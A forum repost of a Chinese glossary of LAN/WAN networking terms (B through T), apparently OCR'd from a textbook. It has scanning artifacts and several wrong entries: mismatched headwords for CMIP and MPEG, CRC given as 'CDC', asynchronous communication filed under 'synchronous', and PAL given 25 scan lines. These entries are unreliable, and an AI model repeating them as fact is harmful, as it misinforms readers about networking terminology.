处理大量数据或一系列复杂功能的计算机的维护工作通常采用这种方式,而且这种工作
通常是在夜间进行的。
? bayonet nut connector (同轴电缆接插件, BNC)—用于细同轴电缆,有一个卡销一样的
套。Male BNC有两个旋钮,插在female BNC的环形槽中。连接时,两个接插件要绞在
一起。
? beaconing (信标)—信标是令牌环网中的错误状态,表明有一个或一个以上的结点出现
操作异常。
? bidirectional interpolation (双向插补)—双向插补是一种视频压缩技术,在序列中影象
的前后影象里都存在与当前影象相同的部分,可以通过创建指向这部分的指针来压缩
帧。
? bits per second (比特/秒, bps)—比特/秒是每秒发送的二进制位( 0或1 )的个数。
? bridge (网桥)—网桥是将使用相同的访问手段的不同局域网段连接在一起的网络传输
设备。例如,使用网桥将一个以太局域网连接到另一个以太局域网,或将令牌环局域网
连接到另一个令牌环局域网上。
? bridge protocol data unit (网桥协议数据单元, BPDU)—B P D U是网桥所用的专门的帧,
用来彼此间交换信息。
术语表计计295
? broadband (宽带)—这种传输中,通信介质上有多个传输通道,允许在同一时刻有多
个结点进行传输。
? broadband ISDN (宽带ISDN, B-ISDN)—当前正处于开发之中,该技术可以提供
1 5 5 M b p s或者更高的数据传送速率。
? broadcast storm (广播扰动)—当大量的计算机或设备要同时传输时,或者当计算机或
设备都要进行重复传输,网络流量超负荷就会引起网络带宽饱和,称之为广播扰动。
? brouter (桥式路由器)—桥式路由器是充当网桥或路由器的一种网络设备,具体是充当
网桥还是路由器,则要根据它转发给定协议的方法而定。
? buffering (缓存)—缓存是一种设备,例如交换机,在存储器中临时存储信息的能力。
? bus (总线)—总线是计算机中用来传输数据的一条路径,例如,在C P U和连接在计算
机上的外设之间的通道。
? bus topology (总线结构)—总线结构是从一台P C或文件服务器连接到另一台的网络设
计,就像链上的链接那样。





C
? cable plant (电缆线路)—用来构成网络的所有的通信电缆的数量。
? cableco—有线电视公司,如T C I。
? carrier sense (载波侦听)—载波侦听是检验通信介质如电缆等以确定电压级别、信号转
换等的过程,通过载波侦听可以说明网络上是否出现了载有数据的信号。
? Carrier Sense Multiple Access with Collision Detection (带有冲突检测的载波侦听多路存
取, CSMA/CD)—C S M A / C D是以太网中使用的一种网络传输控制方法。它通过检查包
冲突来调整传输。
? cell (信元)—是用于高速传输的格式化数据单元,经常用在AT M中。
? cell switching (信元交换) — 一种使用T D M和虚拟通道的转换方式,在每一个T D M时
间片的开头都放置一个简短的指示器或虚拟通道标识符。
? Challenge Handshake Authentication Protocol 难题握手鉴定协议( C H A P )— 用于对口令
加密的协议,例如在一个WA N上传输的服务器帐户口令。
? channel bank (信道组)—信道组是在一个集中的位置组合了通信信道(如T- 1 )的大规模
多路转接器。
? channel service unit (通道服务器, CSU)—这种设备是在网络设备(如路由器)和T载波线
路之间的一个物理接口。
? circuit switching (电路交换)—电路交换技术是一种网络通信技术,采用专用的信道在
两个结点间传输信息。
? Classical IP over ATM (AT M上的经典IP) — AT M上I P的传输,一个严格集中于I P支持
的技术。
? Classless Interdomain Routing (无类别域间路由, CIDR)—一种新的I P编址方法,该方
法忽略了地址的类别设计,在点分十进制地址的后面使用一条斜线,用以指明可用地址
的总数目。
? coaxial cable (同轴电缆)—同轴电缆是一种网络电缆介质,由被绝缘层包围的铜芯组
成。绝缘层又被另外的传导材料如编织导线包围,传导材料又由外层的绝缘材料覆盖。
? collision (冲突)—冲突是在以太网上同时检测到两个或多个包时的状态。
? community name (公用名)—网络代理和网络管理工作站使用的一个口令,其作用是不
让它们的通信被未经授权的工作站或者设备轻易截取。
? community name (公共管理接口协议, CMIP)—该协议是O S I网络管理标准的一部分,
用以收集网络性能数据。
? Compressed Serial Line Internet Protocol (压缩串行线路互连网协议, CSLIP)— S L I P远
程通信协议的扩展,能够提供比S L I P更快的吞吐量。
? computer network (计算机网络)—计算机网络是由通信电缆或无线电波链接的计算机、
打印机设备、网络设备和计算机软件系统。
? concentrator (集中器)—集中器是可以让多个输入和输出同时活动的设备。
? connection-oriented service (面向连接的服务)—这是在L L C子层和网络层间进行的
Type 2操作,提供了多种途径来保证接收结点成功地接收到了数据。
? connectionless service (无连接服务)—无连接服务也就是常说的Type 1操作,是L L C子
层和网络层间的服务,但是这里不能检测数据是否已经确实到达了接收结点。
? current-state encoding (当前状态编码)—这是一种数字信号编码方法,这里,对某信号
状态分配一个二进制值,例如+ 5 v电压为二进制值1,0 v为二进制值0。
? cut-through switching (开通式交换)—通过开通式交换这种交换技术在整个帧到达之前
来转发帧的一部分。
? cyclic redundancy check (循环码校验, CDC)—C D C为一种错误校验方法,这种方法中
要计算包含在帧中的整个信息域的大小,计算出来的值由发送结点的数据链接层插入到
靠近帧尾的位置,并又接收结点的数据链接层进行校验,以确定是否出现了传输错误

B17层 发表时间: 10-07-16 18:33

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
术语表(2)


D
? data circuit equipment (数据电路设备, DCE)—在X . 2 5网络上,D C E指的是一个分组交
换机或者P D N访问设备。
? data link connection identifier (数据链路连接标识, DLCI)—在帧中继网络上用以标识
单个的虚拟连接。
? Data Link Control (数据链路控制, DLC)—设计用于与一个I B M大型机或微型机通信的
协议,它使用S N A通信。
? data service unit (数据服务器, DSU)—与C S U共同使用的一种设备,用于T载波线路上
的通信。D S U为接收网络而转换在线路上传输和接收的数据。
? data terminal equipment (数据终端设备, DTE)—在X . 2 5网络上,D T E是指运行在分组
交换网络上的终端、工作站、服务器和主计算机等。不管实际使用的设备到底是什么,
有时都将D T E设备称为终端。
? data warehouse (数据仓库)—一种数据库访问技术,这种技术将一个主机数据库(例如,
大型机上的数据库)复制到另外一个数据库服务器上,目的是为了能够在不中断主机数
据库的情况下创建报表或者浏览数据,一般情况下可以允许使用点击型报表编写工具。
? datagram (数据报)—X . 2 5的一种传输模式,在这种模式下,没有使用特殊的通信信道,
常常导致数据不能以它们发送时的顺序到达,因为每一个数据报可能会沿不同的路径到
达目的地。
? demand priority (需求优先权)—一种数据通信技术,这种技术可以直接将信息包传送
给目标结点,在传输过程中只经过一个集线器,无需经过其他的网络结点。
? dense wavelength division multiplexing (密集波分多路复用, DWDM)—一种新出现的多
路复用技术,该技术使用单模光纤,可以在一条光缆上建立多个路径同时进行数据传输。
? digital (数字式)—这是一种传输方法,其中不同的信号级都用二进制表示,如二进制0
和1分别代表0 v和+ 5 v。
? digital subscriber line (数字用户线路, DSL)—一种使用高级调制技术的技术,该技术
可以在用户和电话公司之间通过已有的电信网络形成高速的网络连接,其通信速度可以
高达6 0 M b p s。
? discovery (发现)—发现是路由器采用的一个过程,包括采集诸如网络上有多少个结点
以及结点的位置等信息。
? Distance Vector Multicast Routing Protocol (距离向量广播路由协议, DVMRP)—
D V M R P是一种与R I P共同工作的多点广播(也称多点传送)协议,可确定哪个工作站被预
定给了多点传送。
? Domain Name Service (域名服务, DNS)—一种T C P / I P应用协议,该协议可以将计算机
的域名转换为I P地址,或者将I P地址转换为域名。
? dotted decimal notation (点分十进制表示法)—一种编址技术,该技术将四个8位字节,
例如1 0 0 0 0 11 0 . 11 0 111 1 0 . 11 0 0 1 0 11 . 0 0 0 0 0 1 0 1 ,转换成十进制表示( 例如,
1 3 4 . 2 2 2 . 1 0 1 . 0 0 5 ),用以标识网络和网络上的单个主机。
? d r i v e r (驱动程序)—驱动程序是一种软件,可使计算机与N I C、打印机、显示器和硬盘
驱动器进行通信。每一个驱动程序都有其特定的目的,例如,处理以太网通信。
? dynamic addressing (动态编址)—一种编址方法,在这种方法中,无需网络管理员将I P
地址“硬编码”在设备的网络配置中便可以实现I P地址的分配。
? Dynamic Host Configuration Protocol (动态主机配置协议, DHCP)—一种网络协议,通
过D H C P,服务器可以自动地将一个I P地址分配给其网络上的某个设备。
? dynamic routing (动态路由)—在动态路由这种路由进程中,路由器不停地检查网络的
配置,自动更新路由表,并自己来决定如何路由包。





E
? electromagnetic interference (电磁干扰, EMI)—电磁干扰是马达等电力设备引起的磁力
场产生的信号干扰。
? electronic data interchange (电子数据交换, EDI)—使用电子方法在计算机或电话网络
上传输商业、组织和个人数据。
? Electronic Industries Alliance (电子工业联合会, EIA)—这是发展网络布线标准和电子
接口标准的标准化组织。
? encapsulation (封装)—封装是在网络间转换帧的过程。在这一进程中,要将一种类型
的网络的数据帧放入另一网络使用的头部,使得新的头的作用如同发信时的信封。
? enterprise network (企业网)—企业网是L A N、M A N或WA N的组合,为计算机用户提
供一系列计算机和网络资源,以完成各种工作。
? Ethernet (以太网)—以太网是使用C S M A / C D访问方法进行网络数据传输的一种传输系
统。以太网一般是通过总线或总线—星型拓扑结构实施的。
? Extended Binary Coded Decimal Interchange Code (扩充二进制编码十进制交换码,
E B C D I C )—这是一种主要用于I B M大型机的字符编码技术,对2 5 6个字母、数字和特
殊字符组成的字符集进行8位编码。
? E x t r a n e t—一种用WA N链路连接两个或者多个I n t r a n e t所形成的网络。
F
? farm (群)—放置在同一个地方的一组计算机主机(例如大型机)或服务器或两者都有,
例如放置在一个机房内。
? Fast Ethernet (快速以太网)—传输速度在1 0 0 M b p s的以太网通信,其详细说明见标准
IEEE 802.3u。
? fat pipe (粗管)—用于网络主干(如在建筑物的楼层间)以进行高速通信的光纤电缆。
? Fiber Distributed Data Interface (光纤分布式数据接口, FDDI)—F D D I是一种光纤数据
传输方法,采用的拓扑结构为双环拓扑,其传输速度可达1 0 0 M b p s。
? f i b e r-optic cable (光纤电缆)—光纤电缆是一种通信电缆,由两个或多个玻璃或塑料光
纤芯组成,这些光纤芯位于保护性的覆层内,由塑料P V C外部套管覆盖。沿内部光纤进
行的信号传输一般使用红外线。
? File Transfer Protocol (文件传输协议, FTP)—一种T C P / I P应用协议,该协议以批数据
流的方式传输文件,是一种在I n t e r n e t上广泛使用的协议。
? firewall (防火墙)—防火墙是用来保护数据免受外界访问的软件或硬件,也可以防止网
络中数据泄露到外面。
? firmware (固件)—固件是一种存储在R O M等设备的芯片上的软件。
? flow control (流控制)—流控制过程用来确保设备发送信息时的速度不高于接收设备的
接收速度。
? fractal image compression (不规则图象压缩)—不规则图象压缩是一种视频压缩技术,
利用不规则图象片、复制图象和映射的特性来压缩帧。
? frame (帧)—有时“帧”一词可以与“包”交换使用,但帧指的是网络上传输的数据单
元,其中包含与开放系统互连( O S I )的数据链接层(即第2层)相应的控制信息和地址信息。
? frame relay (帧中继)—一种通信协议,使用分组交换和虚拟电路技术进行分组传输,
该技术通过将大量的差错检验功能留给中间结点,可以获得较高的数据传输速率。
? frequency-division multiple access ( 频分多路访问技术, FDMA)—频分多重访问技术在
一种通信介质上通过给每一个信道确立不同的频率来创建不同的信道。
? full-duplex (全双工)—全双工是指可以同时发送、接收信号的能力。






G
? gateway (网关)—网关是一种网络设备,可使不同类型的网络间相互通信,如在复杂
的协议间或不同的E- m a i l系统间进行通信。
H
? half-duplex (半双工)—半双工是指可以发送接收信号、但不能同时进行的能力。
? hop (跳)—跳是帧或包从一个网络向另一个网络点对点的运动。
? horizontal cabling (水平布线)—根据E I A / T I A - 5 6 8标准的定义,水平布线为在同一工作
区域中连接工作站和服务器的布线。
? host (主机)—主机是具有操作系统的,多台计算机可同时访问其文件、数据和服务的
计算机(包括大型机、小型机、服务器或工作站)。程序和信息可在主机上进行处理,或
下载到访问计算机(客户机)上来处理。
? hub (集线器)—集线器是将各个单独的电缆段或单独的L A N连接在一起成为一个网络
的中央设备。
? hybrid fiber/coax (混合光纤/同轴, HFC)电缆—这种电缆由电缆护套组成,电缆护套中
包含着光纤和铜电缆的组合。





I
? impedance (阻抗)—阻碍电流流动的总值。
? Institute of Electrical and Electronics Engineers (电气电子工程师协会, IEEE)—这是由
一群科学家、工程师、技术人员和教育家组成的组织,在开发网络布线和数据传输标准
方面起着领导作用。
? Integrated Services Digital Network (综合业务数字网, ISDN)—一种在电话线上传输数
据服务的网络标准,当前的实际速率为1 . 5 3 6 M b p s,理论上可以达到6 2 2 M b p s的传输速
率。
? Integrated Services Digital Network (综合服务数字网, ISDN)—I S D N是在电话线上用
信道的组合来传递音频、数据和视频服务的WA N技术。
? International Organization for Standardization (国际标准化组织, ISO)—I S O是一国际组
织,致力于建立通信和网络标准,其最为突出、广为人知的贡献是建立了网络协议标
准。
? International Telecommunications Union (国际通信联盟, I T U )—I T U是国际上致力于规
定远程通信标准的组织,例如,它为调制解调器和WA N通信制订了标准。
? Internet Engineering Task Force ( Internet工程任务组, IETF)—I E T F是I S O C的左膀右
臂,致力于与Internet 相关的技术问题。
? Internet Function (互连功能, IWF) — 一个标准,为在AT M上实现帧中继提供重新映射
及封装功能。
? Internet Group Management Protocol (互联网分组管理协议, IGMP)—在多点传送中使
用的协议,其中含有接收用户的地址,服务器使用它来通知路由器哪一个工作站属于多
点传送组。
? Internet —Internet 是由许许多多网络设备和多种通信方法链接的成千上万的小型网络
的集合。
下载
? Internet Packet Exchange (网间包交换, IPX)— 由N o v e l l开发的用在它的N e t Wa r e文件
服务器操作系统上的协议。
? Internet Protocel(Internet 协议, I P )—该协议与T C P或U D P结合使用,通过采用点分
十进制编址,使包到达本地或远程网络上的目标地点。。
? Internet Society (Internet 协会, ISOC)—I S O C是一家非盈利的国际组织,主办会议和
出版物,并监督Internet 标准的执行。
? internetworking (网络互连)—网络互连是将相同或不同类型的网络连接在一起以便相
互通信的过程。
? I n t r a n e t—某个公司组织的私有网络,在该网络中,可以和I n t e r n e t一样使用相同的基
于We b的网络工具,但是对公众的访问有严格的限制。I n t r a n e t通常由一个L A N上的一个
或者多个子网或者V L A N组成。
J
? jamming (阻塞)—交换机使用的一种数据流量控制技术,用来指示由于大量数据引起
的交换机过载。在这种方式中,交换机通过倍增载波信号来模拟冲突。
? jitter (抖动)—抖动是网络上延迟不定的具体表现,抖动会在声频重放时引起明显的错
误,如播放声频时的杂音等。
? Joint Photographic Experts (联合图像专家组, JPEG)压缩—J P E G压缩是使用有失真压
缩技术的压缩标准,由I S O和I T U - T专为静态图像制订



术语表(3)

L
? LAN Emulation (LAN仿真, LANE)—用于使AT M适应于以太网的技术,它创建一个多
点传送的网络,使得预先配置的以太网结点组能够接收传输。
? LAN emulation (局域网仿真)—局域网仿真是一种网络集成方法,用以在相连的L A N
上格式化所有的包以与AT M通信单元(信元)的外型匹配。
? latency (延迟)—延迟是指网络信息从传输设备发送到接收设备所用的时间。
? line-to-line (视线传输)—视线传输是一种无线电信号传输的类型,其中,信号从一点
向另一点传输,而不是在大气中弹跳,从而可以跨越国家或洲的界限。
? local area network (局域网, LAN)—局域网是一系列互连的计算机、打印设备和其他计算
机设备,它们之间共享硬件和软件资源。局域网通常仅限于给定办公地点、楼层或大楼中。
? local bridge (本机桥)—本机桥是连接临近网络的网络设备,可以用来将网络的一部分
分段以缓解网络流量繁忙的问题。
? local management interface extension (局部管理接口扩展)—添加在帧中继帧上的扩展,
可以提供附加的功能,例如多点传送。
? local router (本地路由器)—本地路由器是在同一座大楼或临近的大楼之间(例如在同一
商业区)连接网络的一种路由器。
? Logical link control (逻辑链路控制, LLC)—这是O S I模型的数据链接子层,用来发起
结点间的通信链接,确保链接不会无意识地中断。
? lossy compression (有失真压缩)—有失真压缩是一种压缩图像的方法,它删除一定百
分比的颜色,使得当图像解压缩时,肉眼不会观察到颜色中细微的变化。
? low earth orbiting satellites (低轨卫星, LEO)—一种通信卫星网络,这种通信卫星距离
地面的高度大约在4 3 5到1 0 0 0英里之间。
M
? Management Information Base (管理信息库, MIB)—存储网络性能信息的数据库,该
数据库被存放在网络代理上,可以从网络管理工作站上进行访问。
? Manchester encoding (曼彻斯特编码)—这是一种状态转换编码形式,其中,从低向高
的转换为二进制0,高向低转换为二进制1。
? media access control (介质存取控制, MAC)—这是数据链接层的子层,用来检查网络
帧中包含的地址信息,并控制同一网络上设备共享通信的方式。
? meshed architecture (网络体系)—一种网络体系,其中有多个备用网络路径,如果一
个路径失效,发送设备会自动地重新路由到另外一个路径,不需要用户干预。
? message switching (报文交换)—这种交换方法将数据从一点发送到另一点,每一个中间
结点都可存储数据、等待闲置的传输信道,并在到达目的地后,将数据提交给下一个点。
? metric (度量)—度量是由路由器计算出来的,反映了有关特定传输途径的信息,如路
径长度、下一跳的负载、可用的带宽和路径可靠性等。
? metropolitan area network (城域网, MAN)—城域网是在一大型城市或地区链接多个
L A N的网络。
? Microcom Network Protocol (Microcom网络协议, MNP)—M N P是一套调制解调器的服
务级别,可以提供有效的通信、错误校验、数据压缩和高输入输出总和等能力。
? modem (调制解调器)—调制解调器将计算机输出的数字信号转换为电话线路可以传输
的模拟信号,然后在接收端将输入的模拟信号转换为计算机可以理解的数字信号。
? Moving Open Shortest Path First Protocol (运动图像专家组, MPEG)压缩—M P E G是由
I S O中的M P E G建立的视频压缩标准。
? multicast (多点传送)—一种传输方法,在这种方法中,服务器将需要一个特定多媒体
传输的用户组合成一组。每个数据流只发送一次,但是到达多个地址,而不是分别给每
个地址发送一次数据。
? Multicast Open Shortest Path First Protocol (广播开放最短路径优先协议, MOSPF)—
M O S P F是一种多点广播路由协议,在为多点广播传输寻找从源到目标的最短路径时,
与O S P F相仿。
? multiple system operator(MSO)—这是提供WA N或Internet 服务的一家有线电视公司。
? multiplexer (多路器)—多路器是一种转换器,将一种通信介质分成多个通道,从而结
点可以同时进行通信。当信号被多路传送时,在另一端也必须要多路转换。
? Multiprotocol over ATM (AT M上的多协议, MPOA)—一种通信技术,使得多协议的通
信量能够在AT M上选择路由。
? multistation access unit (多站访问部件, MAU)—M A U是将许多令牌环结点链接到一个
在物理上很像星型结构的拓扑结构上的中央集线器,但在M A U中,包在逻辑上是以环
形结构进行传输的。
302计计局域网/广域网的设计与实现
下载
? multistation access unit (多站访问部件, MAU)—多站访问部件将令牌环结点链接到一
个物理上像星形但数据信号在逻辑的环形上传输的一种拓扑结构上。






N
? National Television Standards Committee (国家电视制式委员会, NTSC)—N T S C是为电
视广播传输建立标准的一个组织。由N T S C制订的电视信号传输标准利用了5 2 5条垂直扫
描线,每秒可传输3 0个帧。
? NetBIOS Extended User Interface (NetBIOS扩展用户接口, NetBEUI)— 由I B M在8 0年
代中期开发,此协议集成了N e t B I O S,用于在网络上进行通信。
? Network Basic Input/Output System (网络基本输入/输出系统, NetBIOS)— 将软件与网
络服务相接口的方法,包括提供为工作站和服务器提供一个网络命名惯例。
? Network Control Protocol (网络控制协议, NCP)—A R PA N E T网络协议,其使用要早于
T C P / I P,但是其功能逐渐被T C P / I P取代。
? Network Device Interface Specification (网络驱动程序接口规范, NDIS)—由微软为网
络驱动器开发的一系列标准,使得一个N I C和一个或多个协议进行通信成为可能。
? Network File System (网络文件系统, NFS)Protocol—T C P / I P文件传输协议,该协议使
用记录流而不是使用成批文件流来传输信息。
? Network Node Interface (网络结点接口, NNI)—一个AT M接口,用于两个AT M交换机
之间的连接,有时候也称为网络到网络的接口。
? network traffic (网络信息流通量)—网络信息流通量是指给定时间内,网络上传输的包
的数量、大小和频率。
? Next Hop Resolution Protocol (下一转发分辨协议, NHRP)— 一个协议,当多个网络通
过AT M连接时,它使得一个网络上的发送结点能够判断出要使用的数据链路层的地址,
以便到达另一个网络上的目标结点。
? Open Database Connectivity (开放数据库互连, ODBC)—由微软开发的一种数据库访问
规则和过程,其目的是作为所有类型的关系数据库的一个标准。
? Open Datalink Interface (开放数据链路接口, ODI)— 由Novell NetWa r e使用的驱动器,
用于在多个网络上传输多个协议。
? Open document Architecture (开放文档体系结构, ODA)—O D A是I S O的标准,是为综
合包含文本、图像、声音和其他表示模式的专门格式化的文档而制订的。
? Open Shortest Path First (开放最短路径优先, OSPF)—开放最短路径优先是路由器采用
的一种路由协议,用来与其他路由器交流有关到其他结点的直接链接等信息。
? Open Systems Interconnection (开放系统互连, OSI)—O S I由I S O和A N S I开发,是一个7
层的模型,为网络上的硬件和软件通信提供一种体制。
术语表计计303
304计计局域网/广域网的设计与实现
下载
? packet (包)—包是为方便在网络上传输而格式化了的数据单元,其中含有与O S I网络
层(即第3层)相应的控制信息及其他信息。
? packet assembler/disassembler (分组组装/拆装器, PA D )—一种将分组封装为X . 2 5格式
并且添加X . 2 5地址信息的设备。当分组到达其目的L A N之后,PA D会把X . 2 5格式信息去
掉。
? packet radio (无线电分组通信)—以短脉冲串的形式通过无线电波传输带有数据的包的
过程。
? packet switching (包交换)—包交换是一种数据传输技术,它在两个传输结点之间建立
起一个逻辑信道,并不停地在许多不同的路径之间发现到达目的地的最好的路由路径。
? partition (分区)—分区即在段的一部分出现故障时关闭电缆段。
? passive hub (无源插孔)—无源插孔是用来以星形拓扑结构连接结点的一种网络传输设
备,当数据信号通过集线器从一个结点传到另一个结点时,不执行信号放大。
? Password Authentication Protocol (口令验证协议, PA P )—当在一个WA N上访问一个服
务器或宿主计算机时,用于验证帐户口令的协议。
? peer protocols (对等协议)—用来使发送结点的O S I模型的各层与相应的接收结点层进
行通信的协议。
? permanent virtual circuit (永久虚拟电路, PVC)—一种通信信道,一直处于连接状态,
不管该结点是否在进行通信。
? phase alternation line (逐行倒相, PA L )—PA L是一种电视传输标准,主要用在非洲、欧
洲、中东和南美洲,它采用了2 5条垂直扫描线,每秒传输2 5帧。
? plain old telephone service (简易老式电话业务, POTS)—规则的语音级电话业务。
? plenum area (高压电缆)—这是一种用特氟纶做套的电缆,由于它在燃烧时不会放射有
毒的气体,所以经常用在高压地区。
? plenum area (高压地区)—高压地区是封闭的地区,其间的大气压要比外界的气压高,
尤其在燃烧时更是如此。建筑物中的高压地区经常可以发展到多个房间或在整个楼层中
蔓延,高压地带包括通风和加热管道。
? Point-to-Point (点到点协议, PPP)— 一个广泛使用的远程通信协议,支持I P X / S P X、
N e t B E U I以及T C P / I P通信。
? power budget (功率分配)—对于光纤电缆通信,功率分配是发送功率和接收器的敏感
性之间的差别,以分贝来衡量。这是信号可以被发送并完好地接受所需要的最小的发送
器功率和接收器敏感性。
? predicted encoding (预测编码)—预测编码是一种视频压缩技术,帧的前一帧具有与其
相同的图像部分,可创建指向这一部分的指针来压缩帧。
? Primary Rate Interface ISDN (ISDN主速率接口, PRI)—I S D N的一种接口,由多个速率
为1 . 5 3 6 M b p s的交换式通信组成。
? primitive (原语)—原语是将O S I协议栈某层的信息传输到另一层(如从物理层传到数据
链接层)的命令。
? Private Network-to-Network Interface(私有网络到网络接口, PNNI)—一个AT M路由选
择协议,最通常使用在与S V C的连接上。
? private automated branch exchange (专用自动交换机, PA B X )—专用自动交换机是一种
专用的自动的电话系统,,但是仍然保留有人工电话总机控制板。
? private branch exchange (专用分组交换机, PBX)—专用分组交换机是一种专用的电话
系统,可以与当地的电话系统相连,也可以不连,它也有一个人工的电话总机控制板。
? private branch exchange (自动用户交换机, PA X )—自动用户交换机是一种完全自动的
(没有电话总机控制板)的专用电话系统。
? promiscuous mode (混合模式)—在混合模式中,在向网络其他连接的段发送帧之前,
网络设备就可以读取帧的目标地址。
? protocol (协议)—协议是人们建立的一套用以指定网络数据如何格式化为包、如何传
输、在接收端如何翻译的标准。
? protocol data unit (协议数据单元, PDU)—在同一个O S I协议栈的各层之间传输的信息。
? Protocol Independent Multicast (协议无关广播, PIM)—协议无关广播是一种多点传送
路由协议,与采用O S P F或R I P为主路由协议的网络兼容。
? public switched telephone network (公用电话交换网络, PSTN)—语音级电话服务。
Q
? Quality of Service (服务质量, QoS)—这是衡量网络传输、质量输入输出总和和可靠性
的手段。

B18层 发表时间: 10-07-16 18:33

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
术语表(4)

R
? radio frequency interference (无线电频率干扰, RFI)—因为电气设备发射的无线电波频
率与网络信号传输使用的频率相同而引起的信号干扰为无线电频率干扰,也称射频干
扰。
? R e a l - Time protocol (实时协议, RT P )—实时协议是为实时多媒体应用程序如视频会议
等开发的多点传送协议。
? R e a l - Time Transport Control Protocol (实时传输控制协议, RT C P )—实时传输控制协议
与RT P协同工作,在多点广播传输上提供专门的控制。,如在缺少带宽时,将彩色降级
为单色。RT C P也提供管理信息。
? redirector (转向器)—转向器是一种通过应用层使用的服务,用来识别并访问其他计算
机。
? redundancy (冗余)—提供额外的电缆和设备来保证计算机和计算机系统能够连续地工
作,甚至在一个或多个网络或计算机单元出现故障时仍能正常工作。
? regional Bell operating company, (RBOC)—这是为指定地区提供电话业务的电信公司。
? remote bridge (远程网桥)—远程网桥是穿越同一个城市、在城市之间、在州之间连接
网络以创建一个大网络的设备。
? Remote Network Monitoring (远程网络监控, RMON)—一种利用远程网络结点(例如工
作站或者网络设备)执行网络监控的标准,其功能包括收集信息进行网络协议分析。可
以在网络的远程部分设立监测器,例如中间可以经过一些网桥或者路由器。
? remote router (远程路由器)—远程路由器是跨越极广的地理区域(如城市之间、州之间
和国家之间)将网络连到WA N中的网络设备。
术语表计计305
? repeater (转发器)—转发器是将包放大并重新定时、以让它沿所有连接在转发器上的
输出电缆段发送的网络传输设备。
? Request for Comment (请求注释, RFC)—请求注释是为推动网络互连、Internet 和计算
机通信而发布的信息文档。Internet 工程组( I E T F )负责对R F C进行分类和管理。
? Resource Reservation Protocol (资源预订协议, RSVP)—资源预订协议用于基于T C P / I P
的网络中,可使应用程序能够预订所需要的计算机和网络资源,如带宽、缓冲、最大脉
冲串和服务级别等。R S V P的英文全写为Resource Reservation Protocol ,有时也写作
Resource Reservation Setup Protocol。
? Reverse Address Resolution Protocol(反向地址解析协议, RARP)—一种网络协议,网
络结点上的软件应用或者网络结点本身可以利用该协议确定它自己的I P。
? ring topology (环形拓扑)—在环形拓扑结构中,网络是由数据的连续路径构成的,没
有起始点和终止点,因此也就没有终结器。
? riser cable (上升电缆)—垂直电缆的另一个称呼,指大楼内各楼层间连接用的电缆。
? router (路由器)—路由器是连接访问方法相同或不同的网络的网络设备,如路由器可
以将以太网与令牌环网相连。路由器根据源于网络管理员的路由表数据、发现的最有效
的路由和预编程信息,使用决策进程来向网络提交包。
? Routing Information Protocol (路由信息协议, RIP)—路由信息协议是路由器用来与其
他路由器交流整个路由表的协议。
S
? scan lines (扫描线)—扫描线用来构造电视视频图像。扫描线中含有图像的片面视图,
并从上到下在显示器上显示。在美国,一个电视帧由5 2 5扫描线组成。
? Secure Sockets Layer (加密套接字协议层, SSL)—S S L是一种在服务器和客户端采用的
数字加密技术,例如在客户端的浏览器和Internet 服务器之间可以使用S S L。
? segment (段)—段是符合I E E E规范的一条电缆,如一段1 8 5米长带有3 0个结点(包括终
结器和网络设备)的10Base2 电缆。
? Sequence Packet Exchange (序列包交换, SPX)—一个N o v e l l协议,当对数据可靠性有
特殊要求时,用于应用软件的网络传输。
? serial Line Internet Protocol (串行线路互连网协议, SLIP)— 一个电信网络的WA N协
议,用于在两个电信载波之间建立最快的路由。
? Service data unit (服务数据单元, SDU)—S D U是一种已经在O S I层间进行过转换并删除
了其中的控制信息和转换指令的协议数据单元。
? service level agreement (服务标准协议, SLA)—WA N服务提供商提出的服务标准书面
保证,包括线路必须有效的最小时间。
? shielded twisted-pair cable (屏蔽双绞线, STP)—屏蔽双绞线是一种网络电缆,由绞在
一起的绝缘电线对组成,并包围着一层屏蔽材料,以进行E M I和R F I保护。所有这些都
处在一个保护套管中。
? Simple Network Management (简单网络管理协议, SNMP)—T C P / I P协议套中的一个协
议,计算机或者网络设备可以通过该协议收集关于网络性能的标准化数据。
306计计局域网/广域网的设计与实现
下载
? spanning tree algorithm (生成树算法)—生成树算法是用以确保帧不会无限循环传输的
软件,并可以使帧沿成本最低最有效的网络路径传输。
? spread-spectrum communications (传播光谱技术)—这种通信技术主要用在无线网络
中,在网络间进行高频率通信时可以用它来替代电缆。
? star topology (星形拓扑)—这是最古老的一种网络设计,整个网络是由多个连接在集
线器上的结点构成。
? stateful autoconfiguration (有状态自动配置)—一种利用网络管理软件,基于网络管理
员给出的一组参数自动分配I P地址的技术。
? stateless autoconfiguration (无状态自动配置)—一种分配I P地址的方法,在该方法中,
网络设备自己给自己分配地址。
? state-transition encoding (状态转换编码)—这是一种检验信号状态的改变(如从高到低、
从低到高等)的数字编码方法。
? static routing (静态路由)—静态路由是一种路由进程,包括对网络管理员根据预先调
试的路由指令而做出的路由决定的控制。
? statistical multiple access (统计多路访问)—统计多路访问是根据任务所需分配通信资
源的一种交换方法,例如,给视频文件分配更多的带宽,而给较小的电子表文件分配较
少的带宽。
? store-and-forward switching (存储转发交换)—在存储转发交换技术中,包可以被缓存,
直到完全接收后再发送,并且网络上有一条开放的信道可以发送包。
? streaming (流)—在从网络接收来的M P E G视频文件完全下载之前播放。
? subnet mask (子网模)—子网模(也称子网掩码)是I P地址的某个确定的部分,用于指明
一个网络的地址类别,可以利用它将网络分成子网,以便进行网络流量管理。
? Switched Multimegabit Data Services (交换多兆位数据服务, SMDS)—也叫做交换式兆
位数据服务,是一种由地区电话公司开发的传输方法,利用该技术可以在M A N和WA N
上提供基于信元的高速通信。
? switched virtual circuit (交换虚拟电路, SVC)—为持续的通信会话而创建的一种通信信
道,通常位于可以处理多个信道的介质上。
? synchronous communications (同步通信)—由数据的连续脉冲串进行的通信,而且数
据的连续脉冲串要受每一个脉冲串起始位置的时钟信号控制。
? synchronous communications (异步通信0—异步通信发生离散的单元中,在离散单元
里,单元的开始位置由前面的开始位标示,终止位由单元最后的停止位给出信号。
? synchronous optical network (同步光纤网络, ONET)—一种光纤通信技术,可以进行高
速的数据通信(每秒在兆位以上)。基于S O N E T的网络可以完成语音、数据和视频通信。
? System Network Architecture (系统网络结构, SNA)—系统网络结构是I B M使用的一种
分层通信协议,以便I B M主机和终端进行通信。
? Systeme Electronique Pour Couleur Avec Memoire (顺序与存储彩色电视系统, SECAM)
—顺序与存储彩色电视系统是一种与PA L相似的电视传输标准,但是是用在法国、俄
国和非洲的一些国家。




T
? T-carrier (T载波)—T载波是可用于数据通信的专用电话线路,将两个不同的位置连接
起来,以进行点对点的通信。
